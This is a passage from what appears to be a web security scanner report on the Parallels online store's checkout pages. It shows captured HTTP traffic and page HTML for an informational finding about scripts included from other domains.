<div class="popup_clear_it"><!-- --></div>
</div><!-- /.popup_window_title_bar_wrapper -->
<div class="popup_middle_wrapper">
<div class="popup_left_shadow_wrapper"><div class="popup_shadow8"></div><div class="popup_shadow7"></div></div><!-- /.popup_left_shadow_wrapper -->
<div class="popup_content_wrapper"><iframe class="popup_content_iframe" src="javascript:false;" scrolling="auto" frameborder="0">Loading...</iframe></div>
<div class="popup_right_shadow_wrapper"><div class="popup_shadow2"></div><div class="popup_shadow3"></div></div><!-- /.popup_right_shadow_wrapper -->
<div class="popup_clear_it"><!-- --></div>
</div><!-- /.popup_middle_wrapper -->
<div class="popup_bottom_bar_wrapper"><div class="popup_shadow6"></div><div class="popup_shadow5"></div><div class="popup_shadow4"></div><div class="popup_clear_it"><!-- --></div></div><!-- /.popup_bottom_bar_wrapper -->
</div><!-- /.popup_window_wrapper -->










<script type="text/javascript">
//if (pageNameFlag=='confirmOrderPage') {
//$('#dr_shipMethod').change(onShippingMethodChange);
//}

if (pageNameFlag=='quickBuyCartPage') {
$("#shippingDifferentThanBilling").click( function(){
$("#dr_shippingContainer").toggle();
});
}
</script>



<script type="text/javascript">
// Function to hide/show info
function hideText(id) {
jQuery('#'+id).toggle();
}
// Function to disable submit button after it has been clicked once already to prevent multiple order submission on CheckoutPayment and ConfirmOrder
function disableButton(button) {
//jQuery(button).hide();
}
// Pull in the overlay verison of popUp on DOM-ready, which will overwrite the old-school function above
if (top === self) { // Don't pull in this code if we're already in a pop-up (iframe)
jQuery(function(){


// Pull in the main CSS for the popUp overlay
       
jQuery.get('/store/para/en_US/DisplayPage/id.TopHeaderPopUpCssStylePage', function(popUpStyle){
jQuery('head').append(popUpStyle);
}, 'html');

// Include browser-specific components
var dataOK = true;
var msie = navigator.userAgent.match(/MSIE (\d+)/);
if (msie) {
var ieVer = parseInt(msie[1]);
if (ieVer < 8) {
dataOK = false;
if ((ieVer < 7) && !jQuery.fn.overlay) { // Include the overlay plugin for IE6
jQuery.ajax({url: '//drh2.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/plugins/jquery.overlay.min.js', dataType: 'script', cache: true, global: false});
}
}
}
else if (/Firefox\/3\.5/.test(navigator.userAgent)) {
dataOK = false; // FF 3.5 bug #477118
}
// Pull in the draggable popUp overlay script
jQuery.ajax({url: '//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/plugins/jquery.draggable.popUp.min.js', dataType: 'script', cache: true, global: false});
// Use embedded data: images for the shadows, if the browser can handle it
if (dataOK) {
jQuery('head').append('<link rel="stylesheet" type="text/css" href="//drh2.img.digitalriver.com/DRHM/Storefront/Library/content/css/PopUp.Shadows.data.css"/>');
}
});
}
</script>



































<script type="text/javascript">
// Show the links that will allow the details to be expanded
jQuery(function(){
jQuery('#shippingDifferentThanBillingIndicator,span.dr_expandDetails').show().find('[data-expand-section]').click(function(){
jQuery('#'+jQuery(this).attr('data-expand-section')).toggle();
return !(this.href);
}).click();
});
$('#dr_ExtendedDownloadServiceOffer .dr_button, #dr_BackUpCDOffer .dr_button').click( function() {
$(this).css('visibility','hidden');
});
</script>








<!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=body-section2.html"-->
</div></td>
</tr>
<tr>
<td id="copyright"><div class="left">&copy; 1999-2011 Parallels, Inc. All rights reserved.</div><div class="right"></div></td>
</tr>
</table>
<script type="text/javascript">
   var errorMssgs = [];
   $('.dr_error').each(function(i) {
       errorMssgs[i] = $(this).html();
   });
   for (i=0;i<errorMssgs.length;i++) {
       if (errorMssgs[i].indexOf('Enter a valid value') > -1) {
        $('#dr_ThreePgCheckoutAddressPaymentInfo p.dr_requiredFieldsInfo').before('<p id="topError" style="color:red; font-size:12px; font-weight:bold;">Sorry, we have encountered an error. Please check that you have filled in everything correctly below.</p>');
           break;
       }
   }
</script>

<script type="text/javascript">
fc_track = (typeof(fc_track) === 'undefined') ? null : fc_track;
$(function () {
   function op_ChangeBreadcrumbs(argCurrentStep) {
if (argCurrentStep === 'billing') {
$("#stepOne").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_off.jpg");
$("#stepTwo").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_on.jpg");
} else if (argCurrentStep === 'review') {
$("#stepOne").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_off.jpg");
$("#stepTwo").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_off.jpg");
$("#stepThree").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step3_verify_on.jpg");
} else if (argCurrentStep === 'thank_you') {
$("#stepOne").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_off.jpg");
$("#stepTwo").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_off.jpg");
$("#stepThree").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step3_verify_off.jpg");
$("#stepFour").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step4_complete_on.jpg");
}
   }
op_ChangeBreadcrumbs(fc_track);
});
</script>

<script>
// Added by J D April 2010 to customize site
//Updated by J J 5/27/2010 - 8/2010
// Floating security Cert to the right
$('div#dr_geoTrustIcon').css('float','right');
$('div#dr_geoTrustIcon a').css('float','right').css('text-align','right'); //for IE
$('div#dr_geoTrustIcon a img').css('float','right').css('text-align','right'); //for IE

// Re-labelling and repositioning the Upsell Interstitial "Continue" (with purchase) link and
// Re-labelling and repositioning the Upsell Interstitial "Upgrade" button
$('#dr_productUpSell form div#dr_siteButtons').replaceWith('<div id="acceptOfferInput"><input class="dr_acceptOffer" type="submit" value="Upgrade your purchase"/></div><div id="origPurchCont"><a href="/store/para/en_US/DisplayShoppingCartPage">Continue with original purchase</a></div>');

//Remove text from Upsell
$('#dr_productUpSell h1').hide('');
//$('#dr_productUpSell #dr_offer ul li div.dr_product img').hide('');
//$('#dr_productUpSell h2').hide('');
$('#dr_productUpSell #dr_offer ul li div.dr_price').hide('');

// Changing the Continue Shopping Button Text
$('#dr_continueShoppingButton a.dr_button').css('background-color','#ffffff').css('font-size','10px').css('color','#0857A6').css('text-decoration','underline').css('float','left');
$('#dr_continueShoppingButton a.dr_button').html('&#60;&#60; Continue Shopping');

// Floating Credit Cards to the right
$('#creditCardLogos').css('float','right');

// Making Cart Total Bigger
$('td#dr_totals table tr#dr_priceTotal td.dr_price').css('font-size','12px').css('font-family','verdana');

// Removing text breadcrumbs
$('#dr_CheckoutBreadcrumb').hide('');

// Removing link from Product Name
$('#dr_ThreePgCheckoutShoppingCart td.dr_productName a[href!="/store/para/en_US/DisplayPage/id.ExtendedDownloadServiceMerchInfoPage"]').each(function(index) {
$(this).wrap("<span class='dr_productInfo'>"+$(this).html()+"</span>").remove();
});
// Adding rounded borders to Account Login Header
$('#dr_loginContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Account Login Information</td><td class="rightRound"></td></tr></table>');

// Adding rounded borders to Billing Info Header
$('#dr_billingContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Billing Information</td><td class="rightRound"></td></tr></table>');

// Adding rounded borders to Additional Info Header
$('#dr_optInContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Additional Information</td><td class="rightRound"></td></tr></table>');

// Adding rounded borders to Payment Info Header
$('#dr_paymentContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Payment Information</td><td class="rightRound"></td></tr></table>');

// Styling Gray Headers
$('.loginTable').css('background-color','#a0a0a4').css('height','26px');
$('td.leftRound').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/leftroundcorner_v2.gif)').css('background-repeat','no-repeat').css('background-position','left').css('height','26px').css('font-family','verdana').css('font-size','13px').css('font-weight','bold').css('color','#fff').css('background-color','#a0a0a4');
$('td.rightRound').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/rightroundcorner_v2.gif)').css('background-repeat','no-repeat').css('background-position','right').css('height','26px').css('width','10px');

// Changing add buttons on Thank You Page
$('#dr_thankYouElementContainer .addOnOffer').css('height','25px');

// Remove refresh button on Quantity
$('#dr_shoppingCartTable input.dr_refreshQtyImage').remove('');

// Styling sub-Cart refresh button
$('input.dr_refreshQtyImage').css('float','right').css('margin','10px 0px 10px 0px');

// Remove remove header
$('th.dr_remove').html('');

// Float the Currency Selector to the right, move it up higher
$('#dr_currencySelector').css('right','10px').css('position','absolute').css('top','10px');

// Float the Checkout Button to the right, move it up higher
$('#dr_checkoutButton').css('right','0px').css('position','absolute').css('top','48px');

// Style the "Estimated Shipping" header
$('div#dr_shippingEst h3.shippingEst').css('background-color','#e6e6e6').css('padding','3px 0px 3px 10px');

// Centering Disclaimer and Changing Font
$('p#dr_cartPricingDisclaimer').css('font-size','11px').css('color','#565656').css('font-family','verdana').css('text-align','center');
$('div#dr_TCFooter').css('font-size','11px').css('color','#565656').css('font-family','verdana').css('text-align','center');

// Adding horizontal rule above the disclaimer
$('<div id="horizontalRule"><hr width="60%" color="#e5e5e5"></div>').insertBefore('p#dr_cartPricingDisclaimer');
$('#horizontalRule').css('width','100%').css('text-align','center').css('margin-top','80px').css('margin-bottom','5px');

// Login Button on Billing Page
$('input#dr_cc_login').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/continueButton.jpg)').css('background-repeat','no-repeat').css('width','77px').css('height','25px');

// Check box to opt-IN for en_US locale
$('#dr_optInEmail div.dr_formLine').replaceWith('<div class="dr_formLine"><label for="optIn" class="dr_label">We would like to keep you informed via email about product updates, upgrades, special offers and pricing. If you do not wish to be contacted via email, please ensure that the box is not checked.</label><input type="hidden" value="on" name="ORIG_VALUE_optIn"/><input type="checkbox" checked="checked" value="on" name="optIn"/></div>');

// Continue Button on Billing Page
$('input#checkoutButton').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/checkoutButton.jpg)').css('background-repeat','no-repeat').css('width','88px').css('height','23px');

// Top Submit Button on Verify Order Page
$('input#submitTop').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/checkoutButton.jpg)').css('background-repeat','no-repeat').css('width','115px').css('height','23px');

// Bottom Submit Button on Verify Order Page
$('input#submitBottom').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/checkoutButton.jpg)').css('background-repeat','no-repeat').css('width','115px').css('height','23px');

// Change Delivery Method to Delivery
$('table#dr_confirmTbl th.dr_deliveryMethod').html('Delivery');

// Remove border from dr_Content Table on Verify Order Page
$('table.dr_confirmTable').css('border','0px');

// Adding border to the Table
$('#dr_cartTbl > tbody > tr > td:first-child').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/lightGreyPixel.gif)').css('background-repeat','repeat-y');
$('#dr_cartTbl > tbody > tr > td:last-child').css('border-right','1px solid #e5e5e5');
// $('#dr_cartTbl > tbody > tr:last-child > td').css('border-bottom','1px solid #e5e5e5');
$('<tr><td colspan="5" style="padding:0; margin:0"><table width="100%" border="0" class="bottomCurveTable"><tr><td class="leftRoundBottom" width="12" style="background-image:url(/DRHM/Storefront/Site/para/cm/images/leftRoundBottom_v2.gif);background-repeat:no-repeat;background-position:0 0;height:9px;width:12px"></td><td class="middleLineBottom" style="background-image:url(/DRHM/Storefront/Site/para/cm/images/middleLineBottom.gif);background-repeat:repeat-x"></td><td class="rightRoundBottom" width="12" style="background-image:url(/DRHM/Storefront/Site/para/cm/images/rightRoundBottom_v2.gif);background-repeat:no-repeat;background-position:top right;height:9px;width:12px"></td></tr></table></td></tr>').appendTo('table#dr_cartTbl');

// Reposition the "Order Number" field on the Invoice page
$('<br /><br />').insertBefore('#dr_Invoice span#dr_orderNumber'); // drop below the order date
$('<br />').insertBefore('#dr_Invoice div#dr_billingAddress');// add space between Ord num and bill addr

// Remove the parallels.com cs email link and form
$("#dr_TechnicalAssistance p:contains('parallels.us.cs@digitalriver.com')").remove();
$("#dr_technicalSupportSection p:contains('parallels.us.cs@digitalriver.com')").remove();
$("#dr_DownloadInformation p:contains('parallels.us.cs@digitalriver.com')").remove();
$("#dr_technicalSupportSection p:contains('OR')").remove();
$("#dr_contactFormSection").remove();

// Replace Payment Method dd on Order Info page
$('#dr_OrderInformation dl div.dr_q2 dd').replaceWith('<dd>We accept Visa&#174;, MasterCard&#174;, EuroCard, Discover&#174;, American Express&#174;, and Diner\'s Club&#174;, as well as PayPal, check cards and ATM cards if they are issued by one of these major credit card companies. We also accept checks, money orders, and wire transfers. If you choose to pay by check, money order, or wire transfer, you will receive instructions on how to send your payment once you submit your order.<p>Our servers encrypt all information submitted to them, so you can be confident that your credit card information will be kept safe and secure.</p></dd>');
// Remove "How do I start a new order?" from "Need Help?" page
$('#dr_Help #dr_helpColumnLeft #dr_orderInformationFAQ ul li.dr_q12').remove();
// Remove "How do I start a new order?" from Order Info page
$('#dr_OrderInformation dl div.dr_q12').remove();
// Replace "Can I order without a credit card?" dd on Order Info page
$('#dr_OrderInformation dl div.dr_q7 dd').replaceWith('<dd>Yes. In addition to credit cards we accept checks, PayPal, money orders and wire transfers. If you choose to pay by check, money order, or wire transfer, you will receive instructions on how to send your payment once you submit your order. </dd>');

// Change Refund Request URL on "Returns and Cancellations" page
$('#dr_ReturnAndCancellations dl div.dr_q3 dd').replaceWith('<dd>To request a refund, go to <a href="http://www.parallels.com/support" target="_blank">www.parallels.com/support</a>.</dd>');

//Updated Backup CD addon button on shopping cart page

$("#dr_ThreePgCheckoutShoppingCart div.addonDetailsButton a img, div.dr_candyRackChildProduct img.dr_buttonCandyRack").attr("src", "/DRHM/Storefront/Site/para/cm/images/Add_4.gif");

$('#dr_ProductDetails #dr_socialNetworkLinks').hide();

$('div.dr_candyRackChildProduct').insertAfter('h2.hdr-alpha');

</script>

<!--!/esi:include -->











<span class="opDefault" id="opmodule_para_bodyBottom"></span>
<script type="text/javascript">
ptomodule.displayModule('para_bodyBottom');
</script>









<script type="text/javascript">
var s_account = 'swsdev';
var omnChannel,omnProp2,omnProp4,omnEvents,omnProducts,omnState,omnZip,omnPurchaseID;
var omnPageName='ThreePgCheckoutShoppingCartPage';

</script>



<script type="text/javascript">
function omnitureProducts(prodString) { // convert FC string to Omniture string
rExp = /,/g;
rExp2 = /\?/g;
prodStringDelimiter = prodString.replace(rExp, ',;');
prodStringSeparator = prodStringDelimiter.replace(rExp2, ';');
s_products = ';'+prodStringSeparator;
return s_products;
}
omnPageName='Checkout: Shopping Cart';
omnChannel='Checkout';
omnProp2='Checkout: Shopping Cart';
omnProp4='Checkout';
omnEvents='scView';
if (typeof fc_prod_remove != 'undefined'){
omnProducts=omnitureProducts(fc_prod_remove);
omnEvents='scRemove';
}
if (typeof fc_prod_add != 'undefined'){
omnProducts=omnitureProducts(fc_prod_add);
omnEvents='scAdd';
}
if (typeof fc_prod_open != 'undefined'){
omnProducts=omnitureProducts(fc_prod_add);
omnEvents='scOpen,scAdd';
}
if (typeof fc_prod_view != 'undefined'){
omnEvents='scView';
}
</script>











   







<script type="text/javascript">

















































</script>
















   
   



   


       <script type="text/javascript">(function(){var cfsTrack = function(){setTimeout(function(){var img = new Image(1,1);img.src = '//7154199726---0---globalCommerce---0---173-193-214-243.cfspx.digitalriver.com/images/cleardot.gif';}, 100);};if (window.attachEvent) {window.attachEvent('onload', cfsTrack);} else {window.addEventListener('load', cfsTrack, false);}})();</script><noscript><img src="//7154199726---0---globalCommerce---0---173-193-214-243.cfspx.digitalriver.com/images/cleardot.gif" height=1 width=1 alt="" border="0" /></noscript>








<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/multimedia/Omniture/s_code_20102010.js"></script>
<script type="text/javascript">









</script>
<script type="text/javascript">
       s.pageName=omnPageName
       if (omnChannel) s.channel= omnChannel
       s.currencyCode='USD'
       s.charSet='UTF-8'
       if (omnProp4) s.pageType= omnProp4 // Page Type
       /* Traffice Variables */
       if (omnProp2) s.prop2= omnProp2 //Category
       if (omnProp4) s.prop4= omnProp4 // Page Type
       /* Conversion Variables */
       if (omnState) s.state= omnState
       if (omnZip) s.zip= omnZip
       if (omnEvents) s.events = omnEvents
       if (omnProducts) s.products= omnProducts
       if (omnPurchaseID) s.purchaseID = omnPurchaseID
       /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
       var s_code=s.t();if(s_code)document.write(s_code)
</script>













<!-- ################################ -->
<!-- ### BEGIN Google Custom, TOP ### -->
<script type="text/javascript">
   var _gaq = _gaq || [];

   _gaq.push(['_setAccount', 'UA-363966-1']);
   _gaq.push(['_setDomainName', '.parallels.com']);
   _gaq.push(['_setAllowHash', false]);
   _gaq.push(['_trackPageview']);

   (function() {
       var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
       ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';

       var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
   })();
</script>
<!-- ### END Google Custom, TOP ### -->
<!-- ################################ -->



<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1067174464;
var google_conversion_language = "en_US";
var google_conversion_format = "3";
var google_conversion_color = "666666";
var google_conversion_label = "g5WWCMyrvQEQwJTv_AM";
var google_conversion_value = 0;
/* ]]> */
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1067174464/?label=g5WWCMyrvQEQwJTv_AM&amp;guid=ON&amp;script=0"/>
</div>
</noscript>




   <!-- Thank You page and Your Order is Being Processed Page -->

   
       
   


<!-- begin retargeting pixel -->



<script src="http://display.digitalriver.com/?aid=244" type="text/javascript" defer="defer"></script>


<!-- end retargeting pixel -->













</body>
</html>
4.2. https://store.parallels.com/store/para/en_US/DisplayThreePgCheckoutAddressPaymentInfoPage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.parallels.com
Path:   /store/para/en_US/DisplayThreePgCheckoutAddressPaymentInfoPage

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store/para/en_US/DisplayThreePgCheckoutAddressPaymentInfoPage HTTP/1.1
Host: store.parallels.com
Connection: keep-alive
Referer: http://store.parallels.com/store?Action=DisplayPage&Env=BASE&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1299874733.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1331410733871%26vn%3D1; ORA_WX_SESSION="10.1.2.144:1028-0#0"; JSESSIONID=943A97EDDD493407ED3F48E4A043CCAD; VISITOR_ID=971D4E8DFAED436758C101F425550FD89CDA569B49779CFD; BIGipServerp-drh-dc1pod6-pool2-active=2416050442.1028.0000; RefURL=http%3A%2F%2Fwww.parallels.com%2Fstore%2Fsmall-business-panel%2Fwindows%2F; aspcms_sid=c268913546380a1096a063587ad8f09a; mbox=check#true#1299874834|session#1299874748891-562918#1299876634; op_browser=safari_534.16; op_browserHigh=safari; op_os=windows; s_cc=true; __utma=1.529009189.1299874733.1299874733.1299874733.1; __utmc=1; __utmb=1.3.10.1299874733; s_gpv_page=Checkout%3A%20Shopping%20Cart; s_invisit=true; s_nr=1299874774917-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=102711070059,0)
Date: Fri, 11 Mar 2011 20:18:43 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app61
Content-Length: 67940




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=meta.html"-->
<link rel="icon" href="/DRHM/Storefront/Site/para/cm/images/favicon.ico" type="image/x-icon" />
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/multimedia/commonFunctions.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/multimedia/Omniture/mbox.js"></script>
<!--!/esi:include -->
<link rel="stylesheet" href="https://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=style.css" type="text/css" media="all" />
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=25017c26&Env=BASE&Locale=en_US&SiteID=para&StyleID=26770400&StyleVersion=58&ceid=170596700&cename=TopHeader&id=ThreePgCheckoutAddressPaymentInfoPage"-->






<!-- REQUEST ID: TIME=1299874723058:NODE=c1a6104:THREAD=5071; ESI Fragment - CREATED: Fri Mar 11 14:18:43 CST 2011 MAX-AGE: 28800+180 -->
<!-- BEGIN TOPHEADER -->
<!-- -->

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>Parallels, Inc. (para) Online Store - Billing</title>
<!-- Accessibility links for Home, Help, and Contents (Sitemap) -->
<link rel="home" href="/store/para/en_US/home" title="Home"/>
<link rel="help" href="/store/para/en_US/help" title="Help"/>
<link rel="contents" href="/store/para/en_US/sitemap" title="Sitemap"/>














<script type="text/javascript">
var q = true; // Page-level global variable

// Temporary popUp function that will be replaced by the overlay-enhanced version when the DOM is fully loaded
function popUp(popURL, popName, popWidth, popHeight) {
self.open(popURL, popName, 'width='+popWidth+',height='+popHeight+',resizable=yes,status=yes,screenX=50,screenY=50,top=50,left=50,scrollbars=yes');
}
</script>






<script type="text/javascript">



if (!window.jQuery) {
document.writeln('<scr'+'ipt type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.3.2.min.js"></scr'+'ipt>');
}

</script>









<script type="text/javascript">
var pageNameFlag = '';
</script>


<!-- Global OT: ptomodule object and browser-detection/cookie-setting -->
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/OTGlobalCode.js"></script>
<script type="text/javascript">
var ot_Country = 'en_US';
</script>
<!-- Site-level OT, from PageBuilder page: OT_globalTrial -->
<script type="text/javascript" src="//atl.img.digitalriver.com/drso/drso-1.4.min.js"></script>
<script type="text/javascript">
if (typeof(optrial) !== 'object') {
optrial = {};
}
//set the cross-domain cookie for NCT Trial Reg test, and delete the download page session cookie (so the sale wil count toward NCT, not download page tests
if (drso.getSessionVar('op612nctfulfill0285001liid').length > 0){
drso.setCookie('op612nctfulfill0285001liid', drso.getSessionVar('op612nctfulfill0285001liid'), drso.getDomain(), null);
drso.deleteCookie('op612downloadparallelsdesktop5formaceliid');
}
</script>
<!-- End of OT_globalTrial -->

<!-- Page-level OT, from OT_ThreePgCheckoutAddressPaymentInfoPage_contentBody -->
<!--
Counter: para ThreePgCheckoutAddressPaymentInfoPage
Referenced context:
- Cookies: op612threepgcheckoutshoppingcartpageliid
Modified: The counter was last modified 2010-07-01 15:24 GMT.
Note: This script should be included in a secure (https) page.
-->

<script language="javascript" type="text/javascript">
<!--
var _o=(typeof opcounter=="object")?opcounter:new Object;_o.D=document;_o.L=_o.D.location;_o.T=
new Date;_o.Q=new Object;_o.C=new Object;_o.U="https://ssl.pto.digitalriver.com/by/counter/612/-/13/event.js";
_o.D_ts=Math.round(_o.T.getTime()/1000);_o.D_tzo=_o.T.getTimezoneOffset();_o.D_loc=_o.L.protocol+
"//"+_o.L.hostname+_o.L.pathname;_o.D_ckl=_o.D.cookie.length;_o.D_ref=_o.D.referrer;function
_oI(){var s=_o.L.search;var c=_o.D.cookie;if(s.length>3){for(var a=s.substring(1).split("&")
,i=0,l=a.length;i<l;i++){var p=a[i].indexOf("=");if(p>0)_o.Q[a[i].substring(0,p)]=unescape(a[i].substring(
p+1));}}if(c.length>3){for(var a=c.split(";"),i=0,b=a.length;i<b;i++){var v=a[i].split("=");
while(v[0].substring(0,1)==" ")v[0]=v[0].substring(1,v[0].length);if(v.length==2)_o.C[v[0]]=
unescape(v[1]);}}}function _oS(){var o=new Object;for(var n in _o)o[n]=_o[n];o.D=o.L=o.T=o.Q=o.C=
o.U=null;var q='';for(var n in o)if(o[n]!=null && o[n]!="")q+=(q.length>0?"&":(_o.U.indexOf(
"?")>0?"&":"?"))+n+"="+escape(o[n]);return _o.U+q;}_oI();for(var n in _o.Q)if(n.substring(
0,2)=="op")_o[n]=_o.Q[n];for(var n in _o.C)if(n.substring(0,2)=="op")_o[n]=_o.C[n];_o.D.write(
'<'+'script type="text/javascript" src="'+_oS()+'"><\/script>');
//-->
</script>

<!-- End of OT_ThreePgCheckoutAddressPaymentInfoPage_contentBody -->


</head>
<body>


<span class="opDefault" id="opmodule_para_bodyTop"></span>
<script type="text/javascript">
ptomodule.displayModule('para_bodyTop');
</script>



<!-- END TOPHEADER -->

<!--!/esi:include --><!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=body-section0.html"-->
<!--[if IE]
<style type="text/css">
#dr_productUpSell form div#dr_siteButtons {
margin-top:130px;
}
table#us_buttons {
margin:0px 0px 0px 225px;    
}    
</style>
-->

<table border="0" cellpadding="0" cellspacing="0" width="805" align="center">

<tr>
<td class="logo" width="667px"><h1><a href="//www.parallels.com/" title="Parallels"></a></h1></td>
<td id="secureInfo" width="138px"><!--SECURE-LOGO-->

<!--!/esi:include -->






<!-- REQUEST ID: TIME=1299874723385:NODE=c1a6104:THREAD=5071 -->








<div id="dr_geoTrustIcon">
<!-- GeoTrust[tm] Smart Icon tag. Do not edit. -->
<script language="javascript" type="text/javascript" src="//smarticon.geotrust.com/si.js"></script>
<!-- end GeoTrust Smart Icon tag -->
</div>

<!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=body-section1.html"-->
       
<!--/SECURE-LOGO-->
</td>

</tr>
<tr>
<td class="breadCrumbsRed" colspan="2"><img src="/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_on.jpg" alt="Step 1 Cart" width="200" height="22" id="stepOne" /><img src="/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_off.jpg" alt="Step 2 Billing" width="200" height="22" id="stepTwo" /><img src="/DRHM/Storefront/Site/para/cm/images/bc_step3_verify_off.jpg" alt="Step 3 Verify" width="200" height="22" id="stepThree" /><img src="/DRHM/Storefront/Site/para/cm/images/bc_step4_complete_off.jpg" alt="Step 4 Complete" width="200" height="22" id="stepFour" /></td>
</tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" class="main" align="center">
<tr>
<td><div id="content">
<!--!/esi:include -->




<span class="opDefaultContent" id="opmodule_para_ThreePgCheckoutAddressPaymentInfoPage_contentBody">







<style type="text/css">
.dr_ExpandPaymentDetailsSection {
font: 9px verdana, arial, sans-serif;
color: #999999;
background-color: #ffffff;
margin: 10px 25px 5px 40px;
padding: 3px 5px;
}
</style>















<!-- Splash Transformer Optimized -->










<!--..Layout: ThreePgCheckoutAddressPaymentInfoPage, Generated: Tue Mar 08 16:00:50 CST 2011..-->
<div xmlns="http://www.w3.org/1999/xhtml">
<div xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" id="dr_ThreePgCheckoutAddressPaymentInfo" class="dr_Content">
<div id="dr_CheckoutPayment">
<h1>Checkout</h1>
<div id="dr_CheckoutBreadcrumb">
<ul id="dr_breadcrumbTitles">
<li id="dr_bcCheckoutBilling" class="dr_titleOn">Billing</li>
<li id="dr_bcConfirmOrder" class="dr_titleOff">Verify Order</li>
<li id="dr_bcThankYou" class="dr_titleOff">Order Completed</li>
</ul>
</div>
<form method="post" action="/store/" name="CheckoutAddressForm">
<input name="Action" type="hidden" value="PostThreePgCheckoutAddressPaymentInfoPage"/>
<input name="SiteID" type="hidden" value="para"/>
<input name="Locale" type="hidden" value="en_US"/>
<input value="com.digitalriver.template.form.checkout.CheckoutForm" name="Form" type="hidden"/>
<input name="CallingPageID" type="hidden" value="ThreePgCheckoutAddressPaymentInfoPage"/>
<input type="hidden" name="CLS_DATA_ANALYTICS" value=""/>
<p>To complete your secure online order, please enter your billing information below. The billing information should be exactly as it appears on your credit card statement.</p>
<p class="dr_requiredFieldsInfo">*Fields marked with an asterisk (*) are required.</p>
<input type="hidden" name="ORIG_VALUE_BILLINGverazipInvalidAddress" value=""/>
<input name="BILLINGverazipInvalidAddress" value="" escape="no" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_SHIPPINGverazipInvalidAddress" value=""/>
<input name="SHIPPINGverazipInvalidAddress" value="" escape="no" type="hidden"/>
